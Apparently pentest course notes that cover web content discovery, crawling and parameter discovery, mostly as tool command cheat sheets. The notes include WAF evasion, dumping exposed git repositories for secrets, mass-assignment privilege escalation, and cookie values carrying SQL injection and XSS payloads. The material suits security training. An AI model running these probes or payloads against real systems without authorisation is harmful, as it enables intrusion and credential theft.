Certified Web Application Pentester
Task 1
Directory & File Bruteforcing
1. Content Discovery Fundamentals
Content Discovery:
├── Forced Browsing (guessing paths)
├── Spidering/Crawling (following links)
├── Source Code Analysis (extracting paths)
├── Error-Based Discovery (info from errors)
└── Backup/Config File Discovery
2. Gobuster
# Directory bruteforcing
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

# With extensions
gobuster dir -u https://target.com \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -x php,html,txt,js,json,xml,bak,asp,aspx,jsp \
  -t 50 -o gobuster_results.txt

# With status code filtering
gobuster dir -u https://target.com \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -b 404,403 -t 50

# With custom headers and cookies (-c sets the Cookie header)
gobuster dir -u https://target.com \
  -w wordlist.txt \
  -H "Authorization: Bearer TOKEN" \
  -c "session=abc123"

# VHOST mode
gobuster vhost -u https://target.com \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain

# DNS mode
gobuster dns -d target.com \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# S3 bucket bruteforcing
gobuster s3 -w bucket-names.txt

# Fuzzing mode
gobuster fuzz -u https://target.com/FUZZ -w wordlist.txt

# Flags reference
# -t           Threads (default 10)
# -b           Blacklist status codes
# -s           Whitelist status codes
# -k           Skip TLS verification
# -p           Proxy URL
# -a           User agent
# -r           Follow redirects
# -n           Don't print status codes
# --no-error   Don't display errors
# --wildcard   Force wildcard processing
3. ffuf (Fuzz Faster U Fool)
# Basic directory fuzzing
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

# With extensions
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -e .php,.html,.txt,.bak,.js,.json,.xml

# Filter by response size
ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 0
ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 4242    # filter a specific size

# Match or filter by status code
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,401,403
ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404     # filter 404s

# Filter by word count or line count
ffuf -u https://target.com/FUZZ -w wordlist.txt -fw 12      # filter by word count
ffuf -u https://target.com/FUZZ -w wordlist.txt -fl 5       # filter by line count

# Filter by regex
ffuf -u https://target.com/FUZZ -w wordlist.txt -fr "not found|error"

# Multiple FUZZ keywords
ffuf -u https://target.com/FUZZ1/FUZZ2 \
  -w dirs.txt:FUZZ1 \
  -w files.txt:FUZZ2

# POST data fuzzing
ffuf -u https://target.com/login -X POST \
  -d "username=FUZZ&password=test" \
  -w usernames.txt -fc 401

# Header fuzzing
ffuf -u https://target.com/api/data \
  -H "X-Custom-Header: FUZZ" \
  -w values.txt

# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt -fs 0

# With proxy (Burp)
ffuf -u https://target.com/FUZZ -w wordlist.txt -x http://127.0.0.1:8080

# Recursive scanning
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3

# Output formats
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.json -of json
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.csv -of csv
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.html -of html

# Rate limiting
ffuf -u https://target.com/FUZZ -w wordlist.txt -rate 100    # requests per second
ffuf -u https://target.com/FUZZ -w wordlist.txt -p 0.1-0.5   # delay range in seconds

# Auto-calibration (smart filtering)
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
4. Feroxbuster
# Recursive content discovery (Rust-based, fast)
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt

# With extensions
feroxbuster -u https://target.com \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \
  -x php,html,txt,js,json,bak \
  -t 50

# Limit recursion depth
feroxbuster -u https://target.com -w wordlist.txt --depth 4

# With filters
feroxbuster -u https://target.com -w wordlist.txt \
  -C 404,403 \
  -S 0 \
  --filter-regex "Not Found"

# With authentication
feroxbuster -u https://target.com -w wordlist.txt \
  -H "Authorization: Bearer TOKEN" \
  -b "session=abc123"

# Extract links from response bodies
feroxbuster -u https://target.com -w wordlist.txt --extract-links

# Collect words from responses for further fuzzing
feroxbuster -u https://target.com -w wordlist.txt --collect-words

# Output to file
feroxbuster -u https://target.com -w wordlist.txt -o results.txt
5. Wordlists Selection
# SecLists - the standard collection

# Quick scan
/usr/share/seclists/Discovery/Web-Content/common.txt                       # ~4,700 entries
/usr/share/seclists/Discovery/Web-Content/big.txt                          # ~20,400 entries

# Thorough scan
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt    # ~220,000 entries
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt       # ~1,273,000 entries

# Technology-specific
/usr/share/seclists/Discovery/Web-Content/apache.txt
/usr/share/seclists/Discovery/Web-Content/nginx.txt
/usr/share/seclists/Discovery/Web-Content/iis.txt
/usr/share/seclists/Discovery/Web-Content/tomcat.txt
/usr/share/seclists/Discovery/Web-Content/CGIs.txt

# CMS-specific
/usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt
/usr/share/seclists/Discovery/Web-Content/CMS/drupal.txt
/usr/share/seclists/Discovery/Web-Content/CMS/joomla-tests.txt

# API-specific
/usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
/usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt

# Raft wordlists (sorted by frequency)
/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt

# Custom wordlist generation
cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt
# -d depth, -m minimum word length
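When combining several of the lists above for one run, deduplicating first avoids sending the same request twice. A minimal sketch (the /tmp paths and sample entries are illustrative stand-ins for the SecLists files):

```shell
# Merge any number of wordlists into one deduplicated list
merge_wordlists() {
  cat "$@" | sort -u
}

# Illustrative sample lists
printf 'admin\nlogin\n' > /tmp/wl_a.txt
printf 'login\napi\n'   > /tmp/wl_b.txt

merge_wordlists /tmp/wl_a.txt /tmp/wl_b.txt > /tmp/combined.txt
wc -l < /tmp/combined.txt   # 3 unique entries: admin, api, login
```

The same function works unchanged on the real SecLists paths.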
6. Backup and Configuration File Discovery
# Common backup file patterns
ORIGINAL_FILE="index.php"

check() {
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$1")
  [ "$code" = "200" ] && echo "[+] Found: $1"
}

for ext in bak old orig save swp swo tmp temp backup copy; do
  check "${ORIGINAL_FILE}.${ext}"
  check ".${ORIGINAL_FILE}.${ext}"
done
check "${ORIGINAL_FILE}~"
check "#${ORIGINAL_FILE}#"

# Common sensitive files
SENSITIVE_FILES=".env .env.bak .env.local .env.production .env.development
.git/config .git/HEAD .gitignore .svn/entries .htaccess .htpasswd
web.config web.config.bak wp-config.php wp-config.php.bak wp-config.php.old
config.php config.inc.php database.php settings.php configuration.php
config.yml config.yaml package.json composer.json Gemfile requirements.txt
Dockerfile docker-compose.yml .dockerignore Makefile Rakefile Gruntfile.js
robots.txt sitemap.xml crossdomain.xml clientaccesspolicy.xml
phpinfo.php info.php test.php server-status server-info elmah.axd trace.axd
.DS_Store Thumbs.db desktop.ini
backup.sql dump.sql database.sql db.sql backup.zip backup.tar.gz site.zip"

for file in $SENSITIVE_FILES; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$file" 2>/dev/null)
  if [ "$code" = "200" ]; then
    echo "[+] FOUND: https://target.com/$file (200)"
  elif [ "$code" = "403" ]; then
    echo "[!] FORBIDDEN: https://target.com/$file (403)"
  fi
done
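The pattern loop above can be factored into a small generator that emits every candidate name exactly once, decoupled from the HTTP check. A sketch covering the same editor/backup conventions (`backup_candidates` is a name I'm introducing here, not a standard tool):

```shell
# Emit backup-file candidates for a given filename, one per line
backup_candidates() {
  local f=$1 ext
  for ext in bak old orig save swp swo tmp temp backup copy; do
    printf '%s.%s\n' "$f" "$ext"     # index.php.bak style
    printf '.%s.%s\n' "$f" "$ext"    # .index.php.swp style (vim swap)
  done
  printf '%s~\n' "$f"                # editor tilde backup
  printf '#%s#\n' "$f"               # emacs autosave
}

backup_candidates index.php | head -4
```

Pipe the output into ffuf or a curl loop instead of hardcoding patterns inline.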
7. Recursive and Intelligent Discovery
# Start with common.txt, then use discovered dirs for deeper scanning

# Phase 1: top-level discovery
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200,301,302,401,403 -ac -o phase1.json -of json

# Phase 2: extract directories from Phase 1
jq -r '.results[] | select(.status == 301 or .status == 302) | .input.FUZZ' phase1.json > discovered_dirs.txt

# Phase 3: deep scan each discovered directory
while read dir; do
  echo "[*] Scanning /$dir/"
  ffuf -u "https://target.com/$dir/FUZZ" \
    -w /usr/share/seclists/Discovery/Web-Content/common.txt \
    -e .php,.html,.txt,.bak,.json,.xml \
    -mc 200,301,302,401,403 -ac \
    -o "phase2_${dir}.json" -of json 2>/dev/null
done < discovered_dirs.txt

# CeWL - custom wordlist generated from the target itself
cewl https://target.com -d 3 -m 5 -w cewl_wordlist.txt

# Use the discovered words for further fuzzing
ffuf -u https://target.com/FUZZ -w cewl_wordlist.txt -e .php,.html,.txt
8. WAF-Aware Content Discovery
# Slower scanning to avoid WAF blocks
ffuf -u https://target.com/FUZZ -w wordlist.txt -rate 50 -p 0.5-1.0

# Rotate user agents
ffuf -u https://target.com/FUZZ -w wordlist.txt \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Use different HTTP methods
ffuf -u https://target.com/FUZZ -w wordlist.txt -X POST
ffuf -u https://target.com/FUZZ -w wordlist.txt -X OPTIONS

# Add headers that some WAFs trust
ffuf -u https://target.com/FUZZ -w wordlist.txt \
  -H "X-Forwarded-For: 127.0.0.1" \
  -H "X-Original-URL: /FUZZ" \
  -H "X-Rewrite-URL: /FUZZ"

# Case variation
# admin → Admin, ADMIN, aDmIn
# Use tools like casemod to generate variations

# Path normalization bypasses
# /admin     → /./admin, //admin, /admin/, /%61dmin
# /admin     → /Admin, /ADMIN
# /admin.php → /admin.PhP, /admin.php.
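The case-variation idea can also be scripted without an external tool. A sketch that emits the three most common variants of a word (`case_variations` is an illustrative helper, not an existing utility):

```shell
# Generate lowercase, UPPERCASE, and Capitalized variants of a word
case_variations() {
  local word=$1
  printf '%s\n' "$word"
  printf '%s\n' "$word" | tr 'a-z' 'A-Z'
  # Uppercase only the first character (bash substring expansion)
  printf '%s%s\n' "$(printf '%.1s' "$word" | tr 'a-z' 'A-Z')" "${word:1}"
}

case_variations admin
# admin
# ADMIN
# Admin
```

Run it over a wordlist with `while read w; do case_variations "$w"; done < wordlist.txt | sort -u`.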
9. Git Repository Exposure
# Check for an exposed .git directory
curl -s https://target.com/.git/config
curl -s https://target.com/.git/HEAD
curl -s https://target.com/.git/logs/HEAD

# git-dumper - download an exposed git repository
git-dumper https://target.com/.git/ ./git_dump

# GitTools
# Dumper
./gitdumper.sh https://target.com/.git/ ./git_dump
# Extractor
./extractor.sh ./git_dump ./git_extracted

# After extraction, analyze:
cd git_extracted
git log --oneline -50                 # commit history
git log --all --diff-filter=D -- .    # deleted files
git show HEAD~5:config.php            # old file versions
git diff HEAD~10 HEAD                 # changes over time
git log -p --all -S 'password'        # search for passwords in history
git log -p --all -S 'api_key'         # search for API keys

# SVN exposure
curl -s https://target.com/.svn/entries
svn-extractor https://target.com/.svn/ ./svn_dump
10. Content Discovery Methodology
# Recommended approach:
1. Start with a quick scan (common.txt, no extensions)
2. Add technology-specific extensions based on fingerprinting
3. Use technology-specific wordlists (wordpress.fuzz.txt, etc.)
4. Check for sensitive files (backup, config, git)
5. Run a recursive scan on discovered directories
6. Generate a custom wordlist with CeWL
7. Check for virtual hosts
8. Scan with an authenticated session (different content)
9. Try different HTTP methods on 405 responses
10. Fuzz parameters on discovered endpoints

# Quick wins to always check:
/robots.txt
/sitemap.xml
/.git/config
/.env
/admin
/login
/api
/swagger
/graphql
/debug
/console
/phpinfo.php
/server-status
/actuator
/.well-known/
/crossdomain.xml
Task 2
Web Crawling and Spidering
Module 03 - Lesson 02: Web Crawling and Spidering
1. Crawling vs Bruteforcing
Crawling:      follows links found in pages (discovers linked content)
Bruteforcing:  guesses paths from wordlists (discovers unlinked content)

Best approach: BOTH
- Crawl first to discover linked content
- Bruteforce to find hidden content
- Use crawl results to build custom wordlists for more bruteforcing
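The last point, turning crawl output into bruteforce input, takes only a short filter. A sketch assuming GNU grep's `-P` flag; the sample URLs are illustrative:

```shell
# Read URLs on stdin, emit unique path segments as wordlist entries
crawl_to_wordlist() {
  grep -oP 'https?://[^/]+\K/[^?#]*' |   # keep the path, drop scheme/host/query
    tr '/' '\n' |                        # split into individual segments
    grep -v '^$' |                       # drop empties from leading slashes
    sort -u
}

printf 'https://target.com/admin/panel?x=1\nhttps://target.com/api/users\n' | crawl_to_wordlist
# admin
# api
# panel
# users
```

Feed the result straight back into ffuf or gobuster as a target-specific wordlist.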
2. Burp Suite Spider
# Burp Suite Crawler (formerly Spider)
# Target → Site map → right-click → Scan → Crawl

# Configuration:
# Dashboard → New scan → Crawl
# - Maximum crawl depth: 10
# - Maximum unique locations: 5000
# - Crawl strategy: Fastest / More Complete / Most Complete
# - Login credentials for authenticated crawling

# Passive spidering:
# Burp automatically builds a site map from proxied traffic
# Target → Site map (auto-populated)

# Key settings:
# Project Options → Connections → Timeouts
# Crawler settings:
# - Follow redirects: yes
# - Maximum link depth: 10
# - Form submission: smart
# - Scope: in-scope only
3. OWASP ZAP Spider
# ZAP Spider (traditional)
# Tools → Spider → starting point URL → Start

# ZAP AJAX Spider (for JavaScript-heavy apps)
# Tools → AJAX Spider → starting point URL → Start
# Uses a real browser (Firefox/Chrome) to render JavaScript,
# discovering dynamic content that traditional spiders miss

# ZAP CLI
zap-cli spider https://target.com
zap-cli ajax-spider https://target.com

# ZAP API
curl "http://localhost:8080/JSON/spider/action/scan/?url=https://target.com"
curl "http://localhost:8080/JSON/ajaxSpider/action/scan/?url=https://target.com"

# Check results
curl "http://localhost:8080/JSON/spider/view/results/?scanId=0"
4. Command-Line Crawlers
# gospider - Go-based web spider
gospider -s https://target.com -c 10 -d 3 -o gospider_output
gospider -s https://target.com -c 10 -d 3 --js --sitemap --robots -o gospider_output
# Options:
# -c          Concurrent requests
# -d          Depth
# --js        Parse JavaScript files
# --sitemap   Parse sitemap.xml
# --robots    Parse robots.txt
# -a          Include other sources (wayback, commoncrawl, virustotal)
# -H          Custom header
# -p          Proxy

# hakrawler - fast web crawler
echo https://target.com | hakrawler -d 3 -t 10 -plain > hakrawler_urls.txt
echo https://target.com | hakrawler -d 3 -js -linkfinder > hakrawler_all.txt

# katana - next-gen web crawler (ProjectDiscovery)
katana -u https://target.com -d 5 -jc -kf -o katana_results.txt
# Options:
# -d        Depth
# -jc       JavaScript crawling
# -kf       Known files (robots.txt, sitemap.xml)
# -aff      Auto form fill
# -hl       Headless browser
# -H        Custom header
# -proxy    Proxy URL
# -f url    Field to output

# Headless browser crawling
katana -u https://target.com -hl -d 5 -jc -o katana_headless.txt

# Crawl with authentication
katana -u https://target.com -H "Cookie: session=abc123" -d 5 -o katana_auth.txt

# Crawl multiple targets
katana -list urls.txt -d 3 -jc -o katana_multi.txt

# wget mirror
wget --mirror --page-requisites --html-extension --convert-links \
  --restrict-file-names=windows --no-parent \
  -P ./mirror https://target.com
5. JavaScript-Aware Crawling
# Modern web apps use JavaScript for routing and content loading;
# traditional crawlers miss this content

# Headless Chrome crawling with a Puppeteer script
cat > crawl.js << 'JS'
const puppeteer = require('puppeteer');
(async () => {
  const browser = await puppeteer.launch({headless: true});
  const page = await browser.newPage();
  const urls = new Set();
  page.on('request', req => urls.add(req.url()));
  await page.goto('https://target.com', {waitUntil: 'networkidle0'});

  // Collect all link targets
  const links = await page.$$eval('a', as => as.map(a => a.href));
  links.forEach(l => urls.add(l));

  // Extract path-like strings from the rendered HTML/JavaScript
  const content = await page.content();
  const jsUrls = content.match(/["'](\/[a-zA-Z0-9\/\-._]+)["']/g);
  if (jsUrls) jsUrls.forEach(u => urls.add(u));

  urls.forEach(u => console.log(u));
  await browser.close();
})();
JS

# Playwright-based crawling works the same way
# but supports Chrome, Firefox, and WebKit

# katana headless mode
katana -u https://target.com -hl -d 5 -jc -ef png,jpg,gif,css,woff -o headless_results.txt

# ZAP AJAX Spider (browser-based)
# Best for single-page applications (SPAs)
6. Authenticated Crawling
# Crawl with a session cookie
gospider -s https://target.com -H "Cookie: session=abc123" -c 10 -d 3 -o auth_crawl
katana -u https://target.com -H "Cookie: session=abc123" -d 5 -o auth_katana.txt

# Crawl with multiple roles
# Admin crawl
katana -u https://target.com -H "Cookie: admin_session=xyz" -d 5 -o admin_crawl.txt
# User crawl
katana -u https://target.com -H "Cookie: user_session=abc" -d 5 -o user_crawl.txt
# Compare results (find admin-only pages)
comm -23 <(sort admin_crawl.txt) <(sort user_crawl.txt) > admin_only_pages.txt

# Burp Suite authenticated crawling
# 1. Log in through the browser with the proxy enabled
# 2. Configure session handling rules
# 3. Run the crawler with a session macro
# Scanner → Scan configuration → Application login → Record macro

# ZAP authenticated crawling
# 1. Manual explore → log in
# 2. Set the authentication method
# 3. Set the user context
# 4. Spider with that user context
7. Sitemap and robots.txt Analysis
# Parse robots.txt
curl -s https://target.com/robots.txt

# Extract disallowed paths (often interesting hidden content)
curl -s https://target.com/robots.txt | grep "Disallow:" | awk '{print $2}' | \
while read path; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null)
  echo "$code $path"
done

# Parse sitemap.xml
curl -s https://target.com/sitemap.xml | grep -oP '<loc>\K[^<]+' | sort -u

# Nested sitemaps
curl -s https://target.com/sitemap_index.xml | grep -oP '<loc>\K[^<]+' | \
while read sitemap; do
  curl -s "$sitemap" | grep -oP '<loc>\K[^<]+'
done | sort -u > all_sitemap_urls.txt

# Common sitemap locations
for path in /sitemap.xml /sitemap_index.xml /sitemap.xml.gz /sitemaps.xml \
            /sitemap1.xml /sitemap/sitemap.xml /wp-sitemap.xml; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path")
  if [ "$code" = "200" ]; then
    echo "[+] Found: $path"
  fi
done
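The Disallow extraction behaves the same on local input, which makes it easy to sanity-check before pointing at a target. A sketch with an inline sample robots.txt:

```shell
# Extract Disallow paths from robots.txt content on stdin
disallowed_paths() {
  awk '/^Disallow:/ {print $2}'
}

printf 'User-agent: *\nDisallow: /admin/\nDisallow: /backup/\nAllow: /public/\n' | disallowed_paths
# /admin/
# /backup/
```

In practice, pipe `curl -s https://target.com/robots.txt` into the same function.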
8. Form Discovery and Analysis
# Extract all forms from a page (join lines first; grep matches per line)
curl -s https://target.com | tr '\n' ' ' | grep -oP '<form[^>]*>.*?</form>'

# Extract form actions
curl -s https://target.com | grep -oP 'action="[^"]*"' | sort -u

# Extract input field names
curl -s https://target.com/login | grep -oP '<input[^>]*>' | \
  grep -oP 'name="[^"]*"' | sort -u

# Hidden fields (often contain CSRF tokens or session data)
curl -s https://target.com | grep -oP '<input[^>]*type="hidden"[^>]*>'

# File upload forms
curl -s https://target.com | grep -oP '<input[^>]*type="file"[^>]*>'
curl -s https://target.com | grep -oP 'enctype="multipart/form-data"'

# Form analysis with Burp Suite
# Proxy → HTTP history → Filter → show only items with parameters
# Target → Site map → right-click → Engagement tools → Find forms
9. API Endpoint Mapping
# Build an API map from crawled content
grep -iE "/api/" crawl_results.txt | sort -u > api_map.txt

# Categorize API endpoints
while read url; do
  path=$(echo "$url" | grep -oP '/api/[^?]+')
  method="GET"   # default assumption
  echo "$method $path"
done < api_map.txt | sort -u > api_routes.txt

# Test each endpoint with different methods
while read route; do
  path=$(echo "$route" | awk '{print $2}')
  for method in GET POST PUT DELETE PATCH OPTIONS; do
    code=$(curl -s -o /dev/null -w "%{http_code}" -X $method "https://target.com$path" 2>/dev/null)
    if [ "$code" != "405" ] && [ "$code" != "404" ]; then
      echo "$method $path → $code"
    fi
  done
done < api_routes.txt > api_method_map.txt

# OpenAPI/Swagger spec generation from crawled endpoints
# Use Burp Suite → Export → OpenAPI spec
# Or manually construct one from the discovered endpoints
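The grep feeding api_map.txt can be tightened to pull just the route portion with query strings stripped, which keeps the dedupe meaningful. A sketch over illustrative crawl lines (GNU grep `-P` assumed):

```shell
# Pull unique /api/ paths (query strings stripped) from crawl output on stdin
extract_api_paths() {
  grep -oP '/api/[^?"\s]+' | sort -u
}

printf 'https://target.com/api/users?id=1\nhttps://target.com/api/orders/2\nhttps://target.com/home\n' | extract_api_paths
# /api/orders/2
# /api/users
```

Without stripping the query string, `/api/users?id=1` and `/api/users?id=2` would count as two distinct routes.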
10. Complete Crawling Pipeline
#!/bin/bash
# crawl_pipeline.sh
TARGET=$1
OUTDIR="recon/${TARGET}/crawl"
mkdir -p "$OUTDIR"

echo "=== Web Crawling Pipeline: $TARGET ==="

# Phase 1: quick spider
echo "[1/5] Quick crawl..."
gospider -s "https://$TARGET" -c 10 -d 3 --js --sitemap --robots \
  -o "$OUTDIR/gospider" 2>/dev/null
cat "$OUTDIR"/gospider/* 2>/dev/null | grep -oP 'https?://[^\s]+' | sort -u > "$OUTDIR/gospider_urls.txt"

# Phase 2: headless crawl for JS content
echo "[2/5] Headless crawl..."
katana -u "https://$TARGET" -hl -d 5 -jc -kf -silent > "$OUTDIR/katana_urls.txt" 2>/dev/null

# Phase 3: combine all URLs
echo "[3/5] Combining results..."
cat "$OUTDIR/gospider_urls.txt" "$OUTDIR/katana_urls.txt" | sort -u > "$OUTDIR/all_crawled.txt"

# Phase 4: extract and categorize
echo "[4/5] Categorizing..."
# Forms and inputs
grep -iE "(login|register|search|upload|contact|comment)" "$OUTDIR/all_crawled.txt" > "$OUTDIR/interesting_forms.txt"
# API endpoints
grep -iE "(api|graphql|rest)" "$OUTDIR/all_crawled.txt" > "$OUTDIR/api_endpoints.txt"
# Parameterized URLs
grep "?" "$OUTDIR/all_crawled.txt" | sort -u > "$OUTDIR/parameterized.txt"
# Interesting file types
grep -iE "\.(js|json|xml|php|asp)" "$OUTDIR/all_crawled.txt" > "$OUTDIR/interesting_files.txt"

# Phase 5: summary
echo "[5/5] Summary..."
echo "Total URLs crawled: $(wc -l < "$OUTDIR/all_crawled.txt")"
echo "Parameterized URLs: $(wc -l < "$OUTDIR/parameterized.txt")"
echo "API endpoints: $(wc -l < "$OUTDIR/api_endpoints.txt")"
echo "Results saved to $OUTDIR/"
Task 3
Parameter Discovery and Analysis
1. Parameter Discovery Methodology
Parameter Sources:
├── URL query parameters (?id=1&name=test)
├── POST body parameters (form data, JSON)
├── HTTP headers (custom headers)
├── Cookies (session, preferences)
├── Path parameters (/api/users/123)
├── Fragment identifiers (#section)
├── WebSocket messages
└── Hidden/undocumented parameters
2. Arjun - Parameter Discovery
# Basic parameter discovery
arjun -u https://target.com/endpoint

# With a custom wordlist
arjun -u https://target.com/endpoint -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

# Multiple URLs
arjun -i urls.txt -oJ arjun_results.json

# Specific HTTP methods
arjun -u https://target.com/api/users -m POST
arjun -u https://target.com/api/users -m JSON    # JSON body

# With headers
arjun -u https://target.com/endpoint --headers "Cookie: session=abc;Authorization: Bearer token"

# Rate limiting
arjun -u https://target.com/endpoint --rate 50

# Stable mode (more accurate, slower)
arjun -u https://target.com/endpoint --stable

# Output formats
arjun -u https://target.com/endpoint -oJ output.json
arjun -u https://target.com/endpoint -oT output.txt
3. x8 - Hidden Parameter Discovery
# x8 - fast hidden parameter discovery
x8 -u "https://target.com/endpoint" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

# POST body with a custom wordlist
x8 -u "https://target.com/api/users" \
  -w params.txt \
  -X POST \
  -H "Content-Type: application/json"

# Test headers as parameters
x8 -u "https://target.com/endpoint" -w headers.txt --headers

# Multiple URLs
x8 -u "https://target.com/endpoint1" -u "https://target.com/endpoint2" -w params.txt
4. Burp Suite Parameter Discovery
# Param Miner extension
# Extensions → BApp Store → install "Param Miner"

# Usage:
# Right-click request → Extensions → Param Miner → Guess params
# Options:
# - Guess GET params
# - Guess POST params
# - Guess headers
# - Guess cookies

# Param Miner technique:
# 1. Adds candidate parameters to the request
# 2. Compares each response to a baseline
# 3. Reports parameters that change the response

# Burp Scanner parameter handling:
# Scanner → Scan configuration → Audit optimization
# - Follow redirects: always
# - Include parameters: all
# - Handle application errors: report

# Active Scan:
# Right-click request → Scan → Active scan
# Tests all discovered parameters for vulnerabilities
5. Parameter Wordlists
# Best wordlists for parameter discovery

# From SecLists (Burp-derived parameter names)
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt    # ~6,453 params

# Common parameters and what they hint at
# id, user_id, uid, account_id, item_id   → IDOR
# url, redirect, next, return, goto, ref  → open redirect, SSRF
# search, q, query, keyword, s, term      → XSS, SQLi
# file, path, page, template, include     → LFI/RFI
# cmd, exec, command, run                 → command injection
# email, username, user, login            → account enumeration
# sort, order, column, dir                → SQLi (ORDER BY)
# callback, jsonp, cb                     → JSONP abuse
# format, type, output                    → XXE, SSRF
# debug, test, admin                      → debug mode
# token, csrf, nonce                      → CSRF bypass
# lang, language, locale                  → LFI
# action, do, func, method                → function abuse
# role, admin, is_admin, privilege        → privilege escalation
# price, amount, quantity, discount       → business logic flaws
# webhook, notify_url, callback_url       → SSRF

# Generate a custom parameter wordlist
# From crawled content (counts kept for frequency ranking)
grep -oP '[?&]\K[^=]+' all_urls.txt | sort | uniq -c | sort -rn > discovered_params_freq.txt

# From JavaScript files
cat js_files/*.js | grep -oP '["'"'"']([a-zA-Z_][a-zA-Z0-9_]{2,30})["'"'"']\s*:' | \
  sed "s/[\"':]//g" | sort -u > js_params.txt

# Combine (strip the frequency counts first)
cat /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  <(awk '{print $2}' discovered_params_freq.txt) js_params.txt | sort -u > custom_params.txt
6. JSON Parameter Discovery
# Test JSON body parameters
curl -s -X POST "https://target.com/api/endpoint" \
  -H "Content-Type: application/json" \
  -d '{"test":"value"}'

# Common JSON parameters to try
# {"admin": true}
# {"role": "admin"}
# {"debug": true}
# {"verbose": true}
# {"internal": true}
# {"is_admin": 1}
# {"user_id": 1}
# {"id": 1}

# Mass assignment testing
# First, see what the normal request looks like
curl -s https://target.com/api/profile -H "Authorization: Bearer TOKEN"

# Then try adding extra fields
curl -s -X PUT https://target.com/api/profile \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","role":"admin","is_admin":true,"verified":true}'

# JSON parameter pollution: which duplicate key wins?
# {"user_id": 1, "user_id": 2}
# {"user": {"id": 1}, "user": {"id": 2}}
7. Header-Based Parameter Discovery
# Custom headers that may change application behavior
HEADERS="X-Forwarded-For X-Forwarded-Host X-Original-URL X-Rewrite-URL
X-Custom-IP-Authorization X-Real-IP X-Remote-IP X-Remote-Addr X-Client-IP
X-Host True-Client-IP Cluster-Client-IP X-Forwarded-Port X-Forwarded-Proto
X-Forwarded-Scheme X-Original-Host X-Forwarded-Server X-Debug X-Debug-Mode
X-Test X-Api-Version Api-Version Accept-Version X-Requested-With
X-HTTP-Method-Override Content-Type Accept"

for header in $HEADERS; do
  response=$(curl -s -o /dev/null -w "%{http_code}:%{size_download}" \
    -H "$header: test_value_12345" https://target.com/endpoint 2>/dev/null)
  echo "$header → $response"
done

# X-HTTP-Method-Override
curl -s -X POST https://target.com/api/users \
  -H "X-HTTP-Method-Override: DELETE"
curl -s -X POST https://target.com/api/users \
  -H "X-HTTP-Method-Override: PUT"

# Content-Type variations
curl -s -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/json" -d '{"test":1}'
curl -s -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/xml" -d '<test>1</test>'
curl -s -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/x-www-form-urlencoded" -d 'test=1'
8. Cookie Parameter Analysis
# Extract all cookies
curl -sI https://target.com | grep -i "set-cookie"

# Analyze cookie values
# Session cookies:    random, high entropy
# Preference cookies: may contain user input
# Tracking cookies:   analytics data
# Debug cookies:      may enable debug mode

# Test extra cookie parameters
curl -s -b "debug=true" https://target.com
curl -s -b "admin=true" https://target.com
curl -s -b "role=admin" https://target.com
curl -s -b "test=1" https://target.com
curl -s -b "internal=1" https://target.com

# Cookie injection points
# Try injecting into existing cookie values
curl -s -b "lang=en' OR 1=1--" https://target.com
curl -s -b "theme=<script>alert(1)</script>" https://target.com
9. GraphQL Parameter Enumeration
# GraphQL field discovery

# Introspection query
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name fields { name } } } }"}' \
  https://target.com/graphql | \
  jq '.data.__schema.types[] | select(.fields != null) | {name, fields: [.fields[].name]}'

# Field suggestion exploitation
# Some GraphQL servers suggest similar field names on typos
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"query":"{ user { passwor } }"}' \
  https://target.com/graphql
# Response: "Did you mean 'password'?"

# Brute force fields when introspection is disabled
# clairvoyance
python3 clairvoyance.py -w field_wordlist.txt -d https://target.com/graphql

# Common GraphQL fields to test:
# user { id name email password role admin token }
# users { id name email role }
# config { debug secret key }
# flag { value }
# admin { users settings }
10. Parameter Analysis Script
#!/bin/bash
# param_analysis.sh
TARGET=$1
ENDPOINT=$2
OUTDIR="recon/${TARGET}/params"
